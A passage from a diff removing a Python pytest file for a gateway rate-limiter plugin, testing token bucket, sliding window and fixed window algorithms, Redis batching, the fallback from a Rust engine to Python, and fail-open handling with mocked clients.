sim_bucket: - tokens = capacity - 1 - sim_bucket[key] = {"tokens": tokens, "last_refill": now} - return [1, int(tokens), 0] - b = sim_bucket[key] - elapsed = now - b["last_refill"] - tokens = min(capacity, b["tokens"] + elapsed * rate) - if tokens >= 1.0: - tokens -= 1.0 - allowed = 1 - time_to_next = 0 - else: - allowed = 0 - time_to_next = int((1.0 - tokens) / rate) + 1 - sim_bucket[key] = {"tokens": tokens, "last_refill": now} - return [allowed, int(tokens), time_to_next] - - mock_client = AsyncMock() - mock_client.eval.side_effect = token_bucket_sim - - limit = "5/s" - t0 = time.time() - - memory_backend = MemoryBackend(TokenBucketAlgorithm()) - redis_backend = RedisBackend( - redis_url="redis://localhost:6379/0", - algorithm_name=ALGORITHM_TOKEN_BUCKET, - fallback=None, - _client=mock_client, - ) - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = t0 - m_allowed, m_limit, m_reset, m_meta = await memory_backend.allow("user:x", limit) - r_allowed, r_limit, r_reset, r_meta = await redis_backend.allow("user:x", limit) - - assert m_allowed is True - assert r_allowed is True - # Both must report the configured limit - assert m_limit == 5 - assert r_limit == 5 - # Remaining should be 4 (one token consumed from a full bucket of 5) - m_remaining = m_meta.get("remaining", 0) - r_remaining = r_meta.get("remaining", 0) - assert m_remaining == 4 - assert r_remaining == 4 - # Reset timestamp should be >= now - assert m_reset >= t0 - assert r_reset >= t0 - - -@pytest.mark.asyncio -async def test_token_bucket_memory_reset_timestamp_always_in_future(): - """Token bucket memory backend must never produce a past/present reset timestamp. - - When tokens_needed / refill_rate < 1, int() truncates to 0, placing - reset_timestamp at now rather than in the future. max(1, ...) guards - against this — mirroring the same protection already present in the - Redis path. - - Regression test: with limit="3/s", after consuming 1 token from a full - bucket, tokens_needed=1 and refill_rate=3, so 1/3 ≈ 0.33 → int() = 0 - without the fix. - """ - backend = MemoryBackend(TokenBucketAlgorithm()) - t0 = 1_000_000.0 - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = t0 - allowed, _, reset_timestamp, _ = await backend.allow("user:test", "3/s") - - assert allowed is True - assert reset_timestamp > t0, ( - f"reset_timestamp ({reset_timestamp}) must be strictly greater than now ({t0}). " "int(tokens_needed / refill_rate) rounds to 0 for fast refill rates without max(1, ...)." - ) - - -@pytest.mark.asyncio -async def test_sliding_window_reset_header_tracks_oldest_request_expiry(): - """ - For sliding_window, X-RateLimit-Reset must equal the timestamp of the - oldest request in the current window plus the window duration — i.e. - when that request ages out and a new slot opens. - - Forces the Python fallback path because the test relies on mocking - time.time() to control both now_unix and internal rate-math timing. - The Rust engine's monotonic clock is not affected by Python time mocks, - so real elapsed time between requests causes the nanos-to-seconds - integer division to diverge from the mocked expectations. - """ - with patch("plugins.rate_limiter.rate_limiter._RUST_AVAILABLE", False): - plugin = _mk("3/s", ALGORITHM_SLIDING_WINDOW) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="t", arguments={}) - t0 = 1_000_000.0 - - # First request at t0 - with patch("plugins.rate_limiter.rate_limiter.time") as mt: - mt.time.return_value = t0 - r1 = await plugin.tool_pre_invoke(payload, ctx) - assert r1.violation is None - reset_after_first = (r1.http_headers or {}).get("X-RateLimit-Reset") - assert reset_after_first is not None - # Reset should be t0 + 1s (window = 1s, oldest entry = t0) - assert float(reset_after_first) == pytest.approx(t0 + 1.0, abs=0.1) - - # Second request at t0 + 0.3s — oldest is still t0 - with patch("plugins.rate_limiter.rate_limiter.time") as mt: - mt.time.return_value = t0 + 0.3 - r2 = await plugin.tool_pre_invoke(payload, ctx) - assert r2.violation is None - reset_after_second = (r2.http_headers or {}).get("X-RateLimit-Reset") - # Reset still anchored to t0 (oldest request) - assert float(reset_after_second) == pytest.approx(t0 + 1.0, abs=0.1) - - -@pytest.mark.asyncio -async def test_token_bucket_retry_after_matches_time_to_next_token(): - """ - When a token bucket request is blocked, Retry-After must be > 0 and - reflect the time until the next token is available (roughly 1/rate seconds). - """ - plugin = _mk("2/s", ALGORITHM_TOKEN_BUCKET) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="t", arguments={}) - t0 = 1_000_000.0 - - # Exhaust both tokens - with patch("plugins.rate_limiter.rate_limiter.time") as mt: - mt.time.return_value = t0 - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - assert r1.violation is None - assert r2.violation is None - - # Third request at same instant — bucket empty - with patch("plugins.rate_limiter.rate_limiter.time") as mt: - mt.time.return_value = t0 - r3 = await plugin.tool_pre_invoke(payload, ctx) - assert r3.violation is not None - retry_after = (r3.violation.http_headers or {}).get("Retry-After") - assert retry_after is not None - retry_secs = int(retry_after) - # With rate 2/s, one token refills in 0.5s — Retry-After should be 1s (integer ceiling) - assert 1 <= retry_secs <= 2 - - -@pytest.mark.asyncio -@pytest.mark.parametrize("algorithm", [ALGORITHM_FIXED_WINDOW, ALGORITHM_SLIDING_WINDOW, ALGORITHM_TOKEN_BUCKET]) -async def test_remaining_header_never_goes_negative_for_any_algorithm(algorithm: str): - """ - X-RateLimit-Remaining must never be negative, regardless of algorithm, - even when requests arrive after the limit is exhausted. - """ - plugin = _mk("2/s", algorithm) - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="u1")) - payload = ToolPreInvokePayload(name="t", arguments={}) - t0 = 1_000_000.0 - - for _ in range(5): # send 5 requests against a limit of 2 - with patch("plugins.rate_limiter.rate_limiter.time") as mt: - mt.time.return_value = t0 - result = await plugin.tool_pre_invoke(payload, ctx) - # Headers are on result.http_headers for allowed requests, - # and on result.violation.http_headers for blocked requests. - if result.violation is not None: - headers = result.violation.http_headers or {} - else: - headers = result.http_headers or {} - remaining_str = headers.get("X-RateLimit-Remaining") - assert remaining_str is not None, "X-RateLimit-Remaining header must always be present" - remaining = int(remaining_str) - assert remaining >= 0, f"Remaining went negative ({remaining}) for algorithm={algorithm}" - - -# ============================================================================= -# P1 Tests — SlidingWindowAlgorithm sweep() correctness -# ============================================================================= - - -@pytest.mark.asyncio -async def test_sliding_window_sweep_evicts_keys_with_fully_stale_timestamps(): - """sweep() must remove keys whose entire timestamp list is outside the window. - - After a burst of activity, a key's timestamps age out over time. The - background sweep must remove such keys so memory does not grow without bound - in long-lived gateways with transient users. - - This is a regression test: the previous implementation only removed keys - with empty lists, leaving stale-but-non-empty entries alive indefinitely. - """ - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # t=0: user makes requests that fill the window - mock_time.time.return_value = 0.0 - await algorithm.allow(lock, "user:alice", 3, 1) - await algorithm.allow(lock, "user:alice", 3, 1) - - # Confirm the key is present in the store - assert any("user:alice" in k for k in algorithm._store), "Key must exist in store after allow() calls" - - # t=5: well past the 1-second window — all timestamps are stale - mock_time.time.return_value = 5.0 - await algorithm.sweep(lock) - - # sweep() must have evicted the key — no stale entry should remain - assert not any("user:alice" in k for k in algorithm._store), "sweep() must evict keys with fully stale timestamps, not just empty lists — " "idle users must not accumulate memory indefinitely" - - -@pytest.mark.asyncio -async def test_sliding_window_sweep_does_not_evict_active_keys(): - """sweep() must not remove keys that still have timestamps within the window.""" - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - mock_time.time.return_value = 0.0 - await algorithm.allow(lock, "user:bob", 3, 60) # 60-second window - - # t=10: still well within the 60-second window - mock_time.time.return_value = 10.0 - await algorithm.sweep(lock) - - # Key must still be present — it has active timestamps - assert any("user:bob" in k for k in algorithm._store), "sweep() must not evict keys whose timestamps are still within the window" - - -@pytest.mark.asyncio -async def test_sliding_window_allow_after_sweep_starts_fresh(): - """After sweep() evicts a stale key, a subsequent allow() treats it as a new key. - - This validates that eviction and re-admission work together correctly: - a user who was rate-limited, goes idle (key swept), and returns should - start with a full quota — not inherit leftover state. - """ - algorithm = SlidingWindowAlgorithm() - lock = asyncio.Lock() - - with patch("plugins.rate_limiter.rate_limiter.time") as mock_time: - # Exhaust the limit at t=0 - mock_time.time.return_value = 0.0 - await algorithm.allow(lock, "user:carol", 2, 1) - await algorithm.allow(lock, "user:carol", 2, 1) - blocked, *_ = await algorithm.allow(lock, "user:carol", 2, 1) - assert blocked is False, "Third request must be blocked" - - # t=5: window expired — sweep evicts the stale key - mock_time.time.return_value = 5.0 - await algorithm.sweep(lock) - - # t=5: allow() must treat carol as a fresh key with full quota - allowed, *_ = await algorithm.allow(lock, "user:carol", 2, 1) - assert allowed is True, "After sweep() evicts the stale key, the next allow() must start fresh " "with a full quota — stale state must not persist" - - -# --------------------------------------------------------------------------- -# Rust engine architecture tests -# --------------------------------------------------------------------------- -# These tests assert the Python↔Rust seam properties required by the spec: -# ARCH-01 check()/check_async() called exactly once per hook invocation -# ARCH-03 Python wrapper contains no rate math (structural — the wrapper -# delegates to check() which returns (allowed, headers, meta)) -# ARCH-04 Rust engine error / exception → fail-open (request allowed) -# ARCH-05 _RUST_AVAILABLE = False path exercises the Python backend -# --------------------------------------------------------------------------- - - -def _mk_rust(rate: str, algorithm: str = ALGORITHM_FIXED_WINDOW) -> RateLimiterPlugin: - """Create a plugin instance that is guaranteed to use the Rust engine.""" - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", True): - # If the real Rust extension is not installed this will silently fall - # back to Python; the architecture tests skip in that case. - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": rate, "algorithm": algorithm}, - ) - ) - return plugin - - -# First-Party -import plugins.rate_limiter.rate_limiter as _rate_limiter_module # noqa: E402 - -_RUST_ENGINE_PRESENT = _rate_limiter_module._RUST_AVAILABLE -_skip_no_rust = pytest.mark.skipif(not _RUST_ENGINE_PRESENT, reason="Rust engine not installed") - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_evaluate_many_called_once_per_tool_hook(): - """ARCH-01: Python wrapper makes exactly one check() call per hook. - - The seam between Python and Rust must be a single PyO3 call regardless of - how many active dimensions (user, tenant, tool) the request touches. - Multiple calls would compound the bridge-crossing overhead under concurrency. - """ - plugin = _mk_rust("10/s") - assert plugin._rust_engine is not None, "Rust engine must be active for this test" - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - with patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) as mock_check: - await plugin.tool_pre_invoke(payload, ctx) - assert mock_check.call_count == 1, f"check() must be called exactly once per hook invocation, got {mock_check.call_count}" - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_evaluate_many_called_once_per_prompt_hook(): - """ARCH-01: Same single-call guarantee for prompt_pre_fetch via check().""" - plugin = _mk_rust("10/s") - assert plugin._rust_engine is not None - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="my_prompt") - - with patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) as mock_check: - await plugin.prompt_pre_fetch(payload, ctx) - assert mock_check.call_count == 1 - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_redis_rust_path_uses_async_entrypoint(): - """Redis-backed Rust path should await check_async exactly once.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "backend": "redis", "redis_url": "redis://localhost:6379/0"}, - ) - ) - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - sync_mock = patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) - async_mock = patch.object(plugin._rust_engine, "check_async", AsyncMock(wraps=plugin._rust_engine.check_async)) - with sync_mock as mock_sync, async_mock as mock_async: - await plugin.tool_pre_invoke(payload, ctx) - assert mock_async.await_count == 1 - assert mock_sync.call_count == 0 - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_memory_rust_path_keeps_sync_entrypoint(): - """Memory-backed Rust path should continue using the sync check entrypoint.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_rust("10/s") - assert plugin._rust_engine is not None - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - sync_mock = patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) - async_mock = patch.object(plugin._rust_engine, "check_async", AsyncMock(wraps=plugin._rust_engine.check_async)) - with sync_mock as mock_sync, async_mock as mock_async: - await plugin.tool_pre_invoke(payload, ctx) - assert mock_sync.call_count == 1 - assert mock_async.await_count == 0 - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch01_single_call_covers_all_active_dimensions(): - """ARCH-01: The single check() call receives all active dimensions. - - When user + tenant + tool are all configured, check() receives them as - separate arguments and builds the checks internally — not split across - multiple calls. - """ - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={ - "by_user": "30/m", - "by_tenant": "300/m", - "by_tool": {"search": "10/m"}, - "algorithm": ALGORITHM_FIXED_WINDOW, - }, - ) - ) - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - with patch.object(plugin._rust_engine, "check", wraps=plugin._rust_engine.check) as mock_check: - await plugin.tool_pre_invoke(payload, ctx) - assert mock_check.call_count == 1 - # check() receives (user, tenant, tool, now_unix, include_retry_after) - args = mock_check.call_args[0] - assert args[0] == "alice", f"user must be passed; got {args[0]}" - assert args[1] == "acme", f"tenant must be passed; got {args[1]}" - assert args[2] == "search", f"tool must be passed; got {args[2]}" - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch02_rust_tool_success_preserves_metadata_shape(): - """Rust fast path should preserve success metadata on the Python wrapper contract. - - The check() API returns (allowed, headers, meta) directly; the Python - wrapper passes meta through as-is. - """ - plugin = _mk_rust("10/s") - assert plugin._rust_engine is not None - - fake_meta = { - "limited": True, - "remaining": 7, - "reset_in": 60, - "dimensions": { - "allowed": [ - {"limited": True, "remaining": 9, "reset_in": 60}, - {"limited": True, "remaining": 7, "reset_in": 60}, - ] - }, - } - fake_headers = { - "X-RateLimit-Limit": "10", - "X-RateLimit-Remaining": "7", - "X-RateLimit-Reset": "1700000060", - "Retry-After": "0", - } - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - with patch.object(plugin._rust_engine, "check", return_value=(True, fake_headers, fake_meta)): - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is None - assert result.metadata == fake_meta - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch02_rust_prompt_block_preserves_details_shape(): - """Rust fast path should preserve blocked details on the Python wrapper contract. - - The check() API returns (allowed, headers, meta) directly; on a block the - Python wrapper uses meta as violation.details. - """ - plugin = _mk_rust("1/s") - assert plugin._rust_engine is not None - - fake_meta = { - "limited": True, - "remaining": 0, - "reset_in": 30, - "dimensions": { - "violated": [{"limited": True, "remaining": 0, "reset_in": 30}], - "allowed": [{"limited": True, "remaining": 8, "reset_in": 60}], - }, - } - fake_headers = { - "X-RateLimit-Limit": "1", - "X-RateLimit-Remaining": "0", - "X-RateLimit-Reset": "1700000030", - "Retry-After": "30", - } - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="search") - - with patch.object(plugin._rust_engine, "check", return_value=(False, fake_headers, fake_meta)): - result = await plugin.prompt_pre_fetch(payload, ctx) - - assert result.violation is not None - assert result.violation.details == fake_meta - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch04_rust_exception_is_fail_open(): - """ARCH-04: Rust engine exception → request is allowed (fail-open). - - The fail-open policy lives in Python, not Rust. If check() raises - any exception, the hook must return an allow result — never block the caller. - """ - plugin = _mk_rust("10/s") - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - with patch.object(plugin._rust_engine, "check", side_effect=RuntimeError("simulated Rust panic")): - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is None, "A Rust engine exception must not block the request — fail-open policy " "requires the hook to allow through on any unexpected error" - assert result.continue_processing is True - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch04_rust_exception_fail_open_prompt_hook(): - """ARCH-04: Same fail-open guarantee for prompt_pre_fetch via check().""" - plugin = _mk_rust("10/s") - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = PromptPrehookPayload(prompt_id="my_prompt") - - with patch.object(plugin._rust_engine, "check", side_effect=RuntimeError("simulated Rust panic")): - result = await plugin.prompt_pre_fetch(payload, ctx) - - assert result.violation is None - assert result.continue_processing is True - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch04_rust_redis_exception_uses_python_fallback_when_enabled(): - """Rust Redis runtime failure should honor redis_fallback=True via Python backend.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "2/s", "backend": "redis", "redis_url": "redis://localhost:6379/0", "redis_fallback": True}, - ) - ) - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - class _BrokenRedis: - async def eval(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - async def evalsha(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - async def script_load(self, *args: Any, **kwargs: Any) -> None: - raise ConnectionError("Redis is down") - - plugin._rate_backend._client = _BrokenRedis() - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - with patch.object( - plugin._rust_engine, - "check_async", - AsyncMock(side_effect=RuntimeError("simulated Rust panic")), - ): - r1 = await plugin.tool_pre_invoke(payload, ctx) - r2 = await plugin.tool_pre_invoke(payload, ctx) - r3 = await plugin.tool_pre_invoke(payload, ctx) - - assert r1.violation is None - assert r2.violation is None - assert r3.violation is not None, "Python fallback must still enforce the configured limit" - assert r3.violation.http_status_code == 429 - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch04_rust_redis_exception_fail_open_when_fallback_disabled(): - """Rust Redis runtime failure should remain fail-open when redis_fallback=False.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "2/s", "backend": "redis", "redis_url": "redis://localhost:6379/0", "redis_fallback": False}, - ) - ) - if plugin._rust_engine is None: - pytest.skip("Rust engine not active") - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - with patch.object( - plugin._rust_engine, - "check_async", - AsyncMock(side_effect=RuntimeError("simulated Rust panic")), - ): - result = await plugin.tool_pre_invoke(payload, ctx) - - assert result.violation is None - assert result.continue_processing is True - - -@pytest.mark.asyncio -async def test_arch05_python_backend_used_when_rust_unavailable(): - """ARCH-05: When _RUST_AVAILABLE is False the Python MemoryBackend is used. - - The Rust engine is an acceleration path; Python memory backend must remain - fully functional as a drop-in fallback when the extension is not installed. - """ - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "3/s"}, - ) - ) - - assert plugin._rust_engine is None, "Python fallback must not activate Rust engine" - assert isinstance(plugin._rate_backend, MemoryBackend), "Python fallback must use MemoryBackend" - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="tool", arguments={}) - - for _ in range(3): - r = await plugin.tool_pre_invoke(payload, ctx) - assert r.violation is None - - blocked = await plugin.tool_pre_invoke(payload, ctx) - assert blocked.violation is not None - assert blocked.violation.http_status_code == 429 - - -@_skip_no_rust -@pytest.mark.asyncio -async def test_arch05_rust_engine_active_when_available(): - """ARCH-05 complement: when Rust is available, engine is wired in for memory backend.""" - plugin = _mk_rust("10/s") - assert plugin._rust_engine is not None, "Rust engine must be active when _RUST_AVAILABLE=True and backend=memory" - - -@pytest.mark.asyncio -async def test_arch05_redis_backend_rust_owns_redis_when_available(): - """ARCH-06: When Rust is available and backend=redis, Rust owns the Redis connection. - - The Rust engine handles both memory and Redis backends. When _RUST_AVAILABLE=True - and backend=redis, _rust_engine is set and the Rust extension communicates with - Redis directly. The Python RedisBackend is still present for the Python fallback - path (when Rust is unavailable). - """ - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod - - if not _rl_mod._RUST_AVAILABLE: - pytest.skip("Rust extension not available in this environment") - - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[ToolHookType.TOOL_PRE_INVOKE], - config={"by_user": "10/s", "backend": "redis", "redis_url": "redis://localhost:6379/0"}, - ) - ) - assert plugin._rust_engine is not None, "Rust engine must be active for Redis backend when Rust is available" - assert isinstance(plugin._rate_backend, RedisBackend) - - -# ============================================================================= -# Redis Batching Tests (REDIS-01, REDIS-03) -# -# REDIS-01: All dimension checks (user, tenant, tool) for a single hook -# invocation must be batched into exactly ONE Redis eval call. -# Current impl makes up to 3 sequential calls — these tests drive -# the implementation of allow_many() and a multi-dimension Lua script. -# -# REDIS-03: The single Lua script call accepts all active dimensions and -# returns all results in one reply. -# ============================================================================= - - -def _mk_redis_plugin(config: dict) -> RateLimiterPlugin: - """Create a Redis-backed plugin with a mock client injected. - - Forces _RUST_AVAILABLE=False so the Python RedisBackend path is exercised — - these tests verify Python-level batching semantics (REDIS-01/03). - The Rust+Redis path is validated by the load test. - """ - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - # First-Party - import plugins.rate_limiter.rate_limiter as _rl_mod # noqa: PLC0415 - - with patch.object(_rl_mod, "_RUST_AVAILABLE", False): - plugin = RateLimiterPlugin( - PluginConfig( - name="rl", - kind="plugins.rate_limiter.rate_limiter.RateLimiterPlugin", - hooks=[PromptHookType.PROMPT_PRE_FETCH, ToolHookType.TOOL_PRE_INVOKE], - config={"backend": "redis", "redis_url": "redis://localhost:6379/0", **config}, - ) - ) - mock_client = AsyncMock() - plugin._rate_backend._client = mock_client - return plugin - - -@pytest.mark.asyncio -async def test_redis01_single_eval_call_per_tool_hook_one_dimension(): - """REDIS-01: With only by_user configured, tool_pre_invoke makes exactly 1 eval call.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin({"by_user": "10/s"}) - mock_client = plugin._rate_backend._client - mock_client.eval = AsyncMock(return_value=[1, 60]) # fixed window: [count, ttl] - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) - - assert mock_client.eval.call_count == 1, f"REDIS-01: expected exactly 1 eval call for 1 active dimension, " f"got {mock_client.eval.call_count}" - - -@pytest.mark.asyncio -async def test_redis01_single_eval_call_per_tool_hook_three_dimensions(): - """REDIS-01: With user + tenant + tool all configured, tool_pre_invoke must - still make exactly 1 eval call — all dimensions batched into one round-trip.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin( - { - "by_user": "30/m", - "by_tenant": "300/m", - "by_tool": {"search": "10/m"}, - "algorithm": ALGORITHM_FIXED_WINDOW, - } - ) - mock_client = plugin._rate_backend._client - # Batched response: one result per dimension — [count, ttl] per dim - mock_client.eval = AsyncMock(return_value=[[1, 60], [1, 60], [1, 60]]) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - await plugin.tool_pre_invoke(payload, ctx) - - assert mock_client.eval.call_count == 1, ( - f"REDIS-01: expected exactly 1 eval call for 3 active dimensions (user+tenant+tool), " f"got {mock_client.eval.call_count} — dimensions must be batched into one round-trip" - ) - - -@pytest.mark.asyncio -async def test_redis01_single_eval_call_per_prompt_hook(): - """REDIS-01: prompt_pre_fetch also makes exactly 1 eval call regardless of active dims.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin( - { - "by_user": "10/s", - "by_tenant": "100/s", - "algorithm": ALGORITHM_FIXED_WINDOW, - } - ) - mock_client = plugin._rate_backend._client - mock_client.eval = AsyncMock(return_value=[[1, 60], [1, 60]]) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = PromptPrehookPayload(prompt_id="my_prompt") - - await plugin.prompt_pre_fetch(payload, ctx) - - assert mock_client.eval.call_count == 1, f"REDIS-01: prompt_pre_fetch must batch all dimensions into 1 eval call, " f"got {mock_client.eval.call_count}" - - -@pytest.mark.asyncio -async def test_redis03_batched_script_returns_result_per_dimension(): - """REDIS-03: The single eval call must pass all active dimensions to the script - and receive back one result per dimension.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin( - { - "by_user": "30/m", - "by_tenant": "300/m", - "by_tool": {"search": "10/m"}, - "algorithm": ALGORITHM_FIXED_WINDOW, - } - ) - mock_client = plugin._rate_backend._client - # Simulate all three dimensions allowed - mock_client.eval = AsyncMock(return_value=[[1, 60], [1, 60], [1, 60]]) - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="search", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - - assert mock_client.eval.call_count == 1 - # The single call must have received all 3 dimension keys - call_args = mock_client.eval.call_args - # NUMKEYS should be 3 (one key per dimension) - numkeys = call_args[0][1] if call_args[0] else call_args[1].get("numkeys", 0) - assert numkeys == 3, f"REDIS-03: batched script must receive 3 keys (one per dimension), got {numkeys}" - assert result.violation is None - - -@pytest.mark.asyncio -async def test_redis03_batched_script_block_when_any_dimension_violated(): - """REDIS-03: If any dimension result is blocked, the hook must return 429.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin( - { - "by_user": "30/m", - "by_tenant": "2/m", # tenant exhausted - "algorithm": ALGORITHM_FIXED_WINDOW, - } - ) - mock_client = plugin._rate_backend._client - # user: allowed, tenant: blocked - mock_client.eval = AsyncMock(return_value=[[1, 60], [3, 60]]) # count > limit for tenant - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice", tenant_id="acme")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - - assert mock_client.eval.call_count == 1 - assert result.violation is not None - assert result.violation.http_status_code == 429 - - -@pytest.mark.asyncio -async def test_redis01_no_eval_calls_when_no_limits_configured(): - """REDIS-01: When no dimensions are configured, no eval call is made.""" - # Standard - from unittest.mock import AsyncMock # noqa: PLC0415 - - plugin = _mk_redis_plugin({}) # no limits - mock_client = plugin._rate_backend._client - mock_client.eval = AsyncMock() - - ctx = PluginContext(global_context=GlobalContext(request_id="r1", user="alice")) - payload = ToolPreInvokePayload(name="test_tool", arguments={}) - - result = await plugin.tool_pre_invoke(payload, ctx) - - assert mock_client.eval.call_count == 0, "No eval calls expected when no limits are configured" - assert result.violation is None - - -# --------------------------------------------------------------------------- -# CORR-01: Rust and Python produce identical allow/block decisions -# --------------------------------------------------------------------------- -# -# Golden-file contract tests: for the same input sequence and the same -# algorithm, both engines must agree on every allow/block decision and on the -# remaining-token count. Time-dependent fields (reset_timestamp, retry_after) -# are not compared because the two engines use different clock sources. -# --------------------------------------------------------------------------- - - -def _python_sequence(algorithm: str, limit: int, n_requests: int) -> list[bool]: - """Run n_requests through the Python MemoryBackend; return allow decisions.""" - # First-Party - from plugins.rate_limiter.rate_limiter import ( # noqa: PLC0415 - FixedWindowAlgorithm, - MemoryBackend, - SlidingWindowAlgorithm, - TokenBucketAlgorithm, - ) - - algo_map = { - ALGORITHM_FIXED_WINDOW: FixedWindowAlgorithm, - ALGORITHM_SLIDING_WINDOW: SlidingWindowAlgorithm, - ALGORITHM_TOKEN_BUCKET: TokenBucketAlgorithm, - } - backend = MemoryBackend(algorithm=algo_map[algorithm]()) - rate_str = f"{limit}/h" # large window so it never resets during test - - async def _run(): - results = [] - for _ in range(n_requests): - allowed, *_ = await backend.allow("user:test", rate_str) - results.append(allowed) - return results - - return asyncio.run(_run()) - - -def _rust_sequence(algorithm: str, limit: int, n_requests: int) 